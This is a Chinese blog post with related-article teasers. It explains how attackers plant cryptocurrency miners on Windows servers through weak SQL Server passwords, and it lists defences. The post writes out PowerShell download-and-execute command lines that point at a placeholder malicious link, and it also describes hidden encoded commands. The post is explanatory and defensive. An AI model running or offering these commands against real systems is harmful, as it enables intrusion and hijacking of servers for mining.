服务器是如何被植入挖矿程序的

最新推荐文章于 2024-01-08 17:23:43 发布
最新推荐文章于 2024-01-08 17:23:43 发布
阅读量2.3k 收藏 3
点赞数
分类专栏: 服务器 文章标签: 服务器 入侵 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014294325/article/details/106340131
版权

首先,攻击者利用Sqlserver应用的弱口令漏洞,并借助Sqlserver自身的命令执行组件执行cmd命令

"C:\Windows\system32\cmd.exe" /c whoami

whoami是操作系统中用于查看当前有效用户名的命令

执行ps命令

powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))"
or
"C:\Windows\system32\cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))"

主动连接恶意下载源,下载看起来人畜无害的文件,病毒程序可以只是一张图片

利用PowerShell访问恶意地址 执行命令

-NoProfile -w hidden -EncodedCommand 加密命令

利用脚本宿主scrcons.exe(浏览器主页劫持常常用到它)或WMI
最后下载挖矿程序到本机,启动并开始挖矿

这个过程中恶意链接可以是伪造的虚拟的临时的中间的,真正恶意的地址一定是封装成了看似人畜无害的文件里,读取出文件数据执行一系列ps命令,并下载挖矿程序并执行。

防范手段:
Sqlserver账号密码加固,定期变更
禁止一般用不到却可能被恶意用的命令
监控系统工具的调用
控制出站(服务器通常不需要请求外部,若需要,配置出站白名单)

Amy安
关注
专栏目录
挖矿程序的处理方式及步骤
LeeKwen的专栏
04-16 3869
概述 随着币圈市场交易的活跃,币价也被日益推高。 从BTC兑美元的在线交易平台上可以看出,BTC的价格屡创新高,这与MG的2W亿脱不了干系。 “重赏之下,必有勇夫”,在互联网圈里也同样适用啊。 所以服务器植入挖矿程序已经不是很稀奇的事情了,很多服务器因为漏洞、弱密码、禁用防火墙等等举措,而被做了提权后,置入了挖矿程序。 如果你接收到阿里云类似于挖矿程序的报警,那就不要慌。借用一句话就是:“遇事不要慌,先拍照,发个朋友圈”。 挖矿程序的处理方式 以下,简单地说一下遇到挖矿...
关于服务器入侵+植入病毒木马
不会飞的鱼、
11-02 1501
近期项目中遇到了几个棘手的问题,海外服务器植入木马WK程序。之前一直听说xxx的服务器入侵被黑,这次实打实遇到,还是没有做好安全防护策略,看了下应该是通过redis无密码漏洞渗透进来,9月14日早晨,客服侧反馈xxx系统从早晨6点半开始无法收到告警和工单,排查xxx相关网元服务都正常运维,内存,磁盘使用率占用正常,其中cpu使用率较高,存在异常情况。随机展开排查。
惊现!服务器为什么被植入挖矿病毒
YingJH
04-28 2383
去年服务器遇到被比特币勒索的病毒,可以看下这篇: 《ElasticSearch安全问题不容忽视,被黑客勒索0.1个比特币》 现在服务器又遇到被挖矿程序植入的病毒,下面就来简单说下我遇到的安全问题。 现在的时代,区块链技术很火,也有很大的泡沫。一直有挖矿的机器时刻在跑着,所以也会有人弄些程序病毒来植入别人的机器,帮他们挖“宝藏”。 今天,看着自己的网站出现504,应该就是挂了...
挖矿病毒入侵服务器(没有解决,重置服务器了)
nsnsttn的博客
04-28 2814
昨天邮件收到一封报告服务器入侵了., 服务器系统是:CentOS 7.9 64位 前排提醒!!!最后水平有限没有解决,重置服务器了😓 攻击原理 由于服务器Redis服务监听了公网端口未设置访问密码并且其进程启动时使用了root用户,攻击者可远程登录到Redis中,通过Redis内置的命令将自己的公钥写入到/root/.ssh/authorized_keys文件夹下,进而可以直接免密登录到服务器上,并在服务器植入恶意脚本,实现利用服务器挖矿操作。 1.top命令查看cpu占用飙到100% top 但
一次真实的应急响应案例(Ubuntu)——暴力破解、写入ssh公钥留后门、植入GPU挖矿程序——事件复现(含靶场环境)
W小哥
03-01 8119
一、SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。 危害: SSH口令长度太短或者复杂度不够,如仅包含数字,或仅包含字母等,容易被攻击者破解,一旦被攻击者获取,可用来直接登录系统,控制服务器所有权限。 一、事件背景 某天客户反馈:Linux服务器有异常连接,疑似被入侵。(真实案
记一次阿里云服务器因Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案
热门推荐
董哥的黑板报
05-15 1万+
一、事情缘由 前段时间给大家录制《玩转Docker》教学视频,链接请参阅https://www.bilibili.com/video/BV1BK4y1A78M,为了更好的演示,就在阿里云搞了一个云服务器,自己本地连接。 云服务器到手之后,为了可以让自己本地可以连接到阿里云服务器上就做了如下操作: 开放了ssh(port:22)端口:为了远程连接使用。 开放了剩余的其他所有端口:录制教学视频时启动了相关容器,容器的一些固定端口6379等映射到了宿主机的随机端口上,为了能从公网访问到容器的内容,就开放
linux服务器植入木马挖矿程序的解决过程记录。
weixin_38067745的博客
12-24 4832
今天我的网站突然无法访问,我马上进入服务器排查情况。用top命令查看进程,发现有某个进程的cpu使用率到达90%以上,而这个进程并不是我启动的。我怀疑这个进程是个木马程序,于是我用kill -9 【进程id】把该进程杀掉。发现没过多久该进程又启动了。我反复试了几次还是不行,于是更加断定我的怀疑了。 经过老大的提醒,有可能是redis的漏洞导致被攻击,我马上...
阿里云服务器挖矿程序侵入问题
samfaker的博客
08-23 1305
gitlab漏洞引起的无文件、无定时任务的挖矿程序解决方法
centos6.8服务器中了挖矿程序病毒的解决方法
emtit2008的专栏
09-04 931
阿里云提示我的centos服务器出现紧急安全事件:挖矿程序;同时也出现服务器异常登录事件。 出现这样的情况,需要根据以下的步骤去处理 第一步:修改登录的帐号密码,输入命令passwd,根据提未修改。 第二步:禁用可疑的IP,阿里云会有一些IP提示,先把异常登录的IP禁用;命令如下 iptables -I INPUT -s 68.183.140.39 -j DROP //禁用指定的IP ...
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
怎么在Linux下通过redis漏洞植入病毒?
Hacker_by_V的博客
03-17 850
Linux下通过redis漏洞植入病毒的流程 经常看到有人在linux下被植入挖矿病毒,而植入病毒的方式多种多样,但通过redis漏洞的方式却是经常见到的,根本原因是系统管理者的安全意识匮乏。多的不说,咱们来看看具体的操作----------- 正好最近比较好奇,于是安装了一个redis蜜罐的捕获来展示如何通过漏洞来植入病毒。 原始日志比这个更多,但这里的片段足够展示整个攻击流程。因为有些人可能对redis命令不熟悉,以下我将逐步的讲解以下流程 这里设置了一个计划任务的内容,目的就是从远程的服务器下载一
虚拟机问题解决记录 1
PiperNigrum的博客
09-21 1057
VBoxGuestAdditions 在安装系统时载入【设备 → 增强功能】。拓展包在安装 VitualBox 完后安装【管理 → 全局设定 → 扩展】。,host 和 guest 共享剪切板、文件等)。| iex】,输入数字时选【1】。,会导致关机之后无法正常打开。解决办法:在终端输入【irm。从 U.S. 改为 U.K.Windows11 的。需要同时下载拓展包【勾选【启动 EFI】
系统激活--操作简单
最新发布
weixin_65685029的博客
01-08 729
第一步、右击开始图标 第二步、选择终端管理员(或者PowerShell管理员) 第三步、输入以下代码 ​第四步、 选择激活方式 第五步、查看是否已经激活
Elixir 入门
坚强2002@CSDN
01-01 9619
Erlang Resources里面关于Elixir的资料越来越多,加上Joe Armstrong的这篇文章,对Elixir的兴趣也越来越浓厚,投入零散时间学习了一下.零零散散,测试代码写了一些,Evernote中笔记更是混乱,还是逐步整理出来.    Elixir is a functional, meta-programming aware language built on t
web 服务被植入挖矿病毒
weixin_52834323的博客
02-21 141
此外,还会篡改Web 主页文件,植入用于JS 挖矿的代码,本文就此病毒进行详细分析。监控磁盘信息,当新插入磁盘或磁盘属性为可移动硬盘时,将自身拷贝到磁盘RECYCL 目录下并设为隐藏,此外还会隐藏根目录下原文件夹并创建具有文件夹图标的快捷方式。病毒首先会根据获取的IP 枚举其C 类地址,然后使用如下弱口令通过WMI 进行暴力破解,若登录成功则在相应机器上执行payload 安装恶意WMI 计划任务。此次截获的病毒文件是一个高度混淆的VBS 文件,其第一行是加密后的主要恶意代码,2-5 行是解密算法。
快速激活windows
m0_63788547的博客
01-02 938
快速激活windows
windows挖矿程序下载
07-27
- *1* [服务器是如何被植入挖矿程序的](https://blog.csdn.net/u014294325/article/details/106340131)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值